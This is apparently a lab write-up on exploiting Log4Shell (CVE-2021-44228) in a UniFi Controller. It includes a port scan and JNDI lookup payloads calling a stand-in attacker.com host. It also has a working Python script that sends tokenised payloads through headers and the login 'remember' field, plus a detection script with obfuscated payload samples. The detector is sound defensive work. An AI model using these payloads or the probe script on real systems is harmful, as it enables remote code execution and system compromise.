Core Concept
Targeted enumeration revealed a UniFi Controller (v6.4.54) exposed over HTTPS. Releases before 6.5.54 bundle a Log4j 2 build affected by Log4Shell (CVE-2021-44228): a JNDI lookup string placed in any request value the controller writes to its log is expanded by the logger and results in remote code execution.
Gaining Initial Foothold
Target Information
- IP: 10.129.129.190
- Service: UniFi Controller
- Version: 6.4.54
- URL: https://10.129.129.190:8443
- Vulnerability: CVE-2021-44228
Full Port Scan
sudo nmap -sS -v4 -T5 -p 1-65535 10.129.129.190
Results (the scan ran without -sV, so the Service column is the name from nmap's port table, not a fingerprint; confirm with a version scan on the open ports before relying on it):

| Port | State | Service | Notes |
|---|---|---|---|
| 22/tcp | open | ssh | Potential for lateral movement once credentials are recovered |
| 6789/tcp | open | ibm-db2-admin | Uncommon; the UniFi default on this port is the mobile speed-test service, not DB2 |
| 8080/tcp | open | http-proxy | UniFi device-inform port; browser requests are redirected to 8443 |
| 8443/tcp | open | https-alt | UniFi Controller Web UI |
| 8843/tcp | open | unknown | UniFi guest-portal HTTPS |
| 8880/tcp | open | cddbp-alt | UniFi guest-portal HTTP |
Vulnerability: CVE-2021-44228
Log4Shell affects Java applications that ship Log4j 2 versions 2.0-beta9 through 2.14.1. The logger expands `${jndi:...}` lookups inside any string it logs, so attacker-controlled input that reaches a log statement can lead to:
- Remote Code Execution (RCE)
- Full system compromise
Exploitation Overview (via callback payload)
${jndi:ldap://attacker.com/exploit}
Injectable fields:
- Headers (User-Agent, X-Forwarded-For)
- Form inputs, URLs, etc.
Warning
This vulnerability is critical and can be exploited remotely. It was actively used in real-world attacks after its disclosure in December 2021.
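Because Log4j resolves nested lookups before the JNDI one, real probes rarely contain the literal string `${jndi:`; a grep for it misses `${${lower:j}ndi:...}`, `${${::-j}${::-n}...}` and URL-encoded forms. The following detection logic is an added example, not code from this writeup: it de-obfuscates the lookup syntax and runs over constructed access-log lines (the IPs, timestamps and hostnames in SAMPLE_LOG are made up for the example).

```python
"""Detect Log4Shell probes in web logs, including obfuscated lookups.

Added example, not part of the original writeup. SAMPLE_LOG is constructed;
its addresses and hostnames are placeholders.
"""
import re
from typing import Iterable, List, Optional, Tuple
from urllib.parse import unquote

# Log4j 2 lookup tricks used to hide "${jndi:" from naive matching. Each pattern
# only matches an innermost lookup (no nested braces inside it), so applying
# them repeatedly resolves nesting from the inside out.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.I)
# "${x:-d}" evaluates to the default d when lookup x is undefined; attackers
# abuse this as "${::-j}" or "${env:NOPE:-j}" to spell the payload one char at a time.
_DEFAULT = re.compile(r"\$\{([^${}]*?):-([^${}]*)\}")
# Lookup names are case-insensitive in Log4j, so match ${JNDI: as well.
_JNDI = re.compile(r'\$\{\s*jndi\s*:[^}"\s]*\}?', re.I)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lower/upper/default lookups until the string stops changing."""
    text = unquote(text)  # payloads in request URIs are usually URL-encoded in the log
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(2), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(text: str) -> Optional[str]:
    """Return the de-obfuscated JNDI lookup contained in text, or None."""
    m = _JNDI.search(normalize(text))
    return m.group(0) if m else None


def scan_log_lines(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalized lookup) for every line that carries one."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((n, found))
    return hits


# Constructed combined-log-format lines: one benign, one plain payload, several
# obfuscated payloads, one benign "${HOME}" that must not trigger, one URL-encoded probe.
SAMPLE_LOG = [
    '10.10.14.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.com/exploit}"',
    '10.10.14.5 - - [11/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.com/a}"',
    '10.10.14.5 - - [11/Dec/2021:03:14:13 +0000] "POST /api/login HTTP/1.1" 400 31 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker.com/a}"',
    '10.10.14.5 - - [11/Dec/2021:03:14:15 +0000] "GET /docs?q=${HOME} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.10.14.5 - - [11/Dec/2021:03:14:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:${upper:L}${lower:D}ap://attacker.com/a}"',
    '10.10.14.5 - - [11/Dec/2021:03:14:19 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.com%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for line_no, lookup in scan_log_lines(SAMPLE_LOG):
        print(f"line {line_no}: {lookup}")
```

The normalized lookup is what you want in the alert rather than the raw line: it makes the callback host and scheme (ldap, rmi, dns) readable and lets you pivot on the attacker's infrastructure across differently obfuscated attempts.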
Tip
Use tools like log4j-scan or nuclei to detect active injection points automatically. Both confirm a blind injection through an out-of-band DNS or LDAP callback (nuclei uses interactsh by default), so the target must be able to reach your listener for a hit to register.
Next Steps
- Identify input vectors (headers, JSON fields) in the UniFi web interface; any value the controller writes to its log is a candidate.
- Set up a listener with ldap-ref-server or marshalsec. The lookup is blind, so the listener must be reachable from the target.
- Capture the callback, then have the listener answer the LDAP lookup with a reference to the attacker-hosted class or serialized payload that yields RCE.
- Post-exploitation: look for credentials, config backups, or SSH pivoting (port 22 is open).
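The exploitation overview and the steps above both come down to placing a tokenised JNDI lookup in each candidate field and attributing whichever callback arrives. The block below is an added example (not code from this writeup or from the tools it names) that builds one probe per injection point against the target above and maps a callback hostname back to the field that triggered it. It assumes the page's placeholder domain attacker.com has wildcard DNS pointing at an LDAP listener on port 1389 (LDAP_PORT); the helper names are illustrative. The headers are the ones listed on the page; the `remember` field of the JSON login body posted to /api/login is the publicly documented UniFi Controller injection point. Answering the LDAP lookup is the listener's job (ldap-ref-server or marshalsec), not this script's.

```python
"""Per-vector Log4Shell probes for the UniFi Controller enumerated above.

Added example, not part of the original writeup. Assumptions: wildcard DNS for
ATTACKER_HOST points at our listener on LDAP_PORT; helper names are illustrative.
"""
import json
import secrets
import ssl
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Dict, List, Optional

TARGET = "https://10.129.129.190:8443"  # from the port scan
ATTACKER_HOST = "attacker.com"          # placeholder, as on the page
LDAP_PORT = 1389                        # assumption: the port our listener is on


@dataclass
class Probe:
    vector: str               # where the payload was placed
    token: str                # unique label that comes back in the DNS/LDAP lookup
    url: str
    headers: Dict[str, str]
    body: Dict[str, object]


def jndi_payload(token: str, host: str = ATTACKER_HOST, port: int = LDAP_PORT) -> str:
    """JNDI lookup whose callback hostname carries the token.

    Putting the token in the hostname means the DNS query alone attributes the
    hit, even when egress filtering blocks the LDAP connection itself.
    """
    return f"${{jndi:ldap://{token}.{host}:{port}/a}}"


def build_probes(target: str = TARGET, host: str = ATTACKER_HOST) -> List[Probe]:
    """One probe per injection point, each with its own token."""
    login_url = f"{target}/api/login"
    dummy = {"username": "probe", "password": "probe", "strict": True}
    probes = []
    # Generic header vectors from the writeup.
    for header in ("User-Agent", "X-Forwarded-For"):
        token = secrets.token_hex(4)
        headers = {"Content-Type": "application/json", header: jndi_payload(token, host)}
        probes.append(Probe(f"header:{header}", token, login_url, headers, dict(dummy)))
    # The documented UniFi vector: the "remember" field of the login JSON is logged.
    token = secrets.token_hex(4)
    body = dict(dummy, remember=jndi_payload(token, host))
    probes.append(Probe("body:remember", token, login_url,
                        {"Content-Type": "application/json"}, body))
    return probes


def attribute_callback(callback_name: str, probes: List[Probe]) -> Optional[str]:
    """Map a hostname seen on the listener (token.attacker.com) back to its vector."""
    label = callback_name.split(".", 1)[0].lower()
    for p in probes:
        if p.token == label:
            return p.vector
    return None


def send_probe(probe: Probe, timeout: float = 10.0) -> int:
    """POST the probe and return the HTTP status; the self-signed cert is not verified."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(probe.url, data=json.dumps(probe.body).encode(),
                                 headers=probe.headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code  # a 4xx for the bogus login is expected; the lookup has already fired


if __name__ == "__main__":
    probes = build_probes()
    for p in probes:
        print(f"[{p.vector}] token={p.token} status={send_probe(p)}")
    # When the listener logs a lookup for "<token>.attacker.com", attribute it with
    # attribute_callback("<token>.attacker.com", probes) -> e.g. "body:remember"
```

One token per field is what turns a "we got a callback" into "the remember field is the sink", which is the information you need before committing to a full exploitation chain against that one vector.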
Related Tools
- nuclei - CVE scanning
- log4j-scan - Log4Shell-specific scanner
- Burp Suite - Manual fuzzing
- ldap-ref-server - LDAP exploitation (serves the malicious referral that answers the JNDI lookup)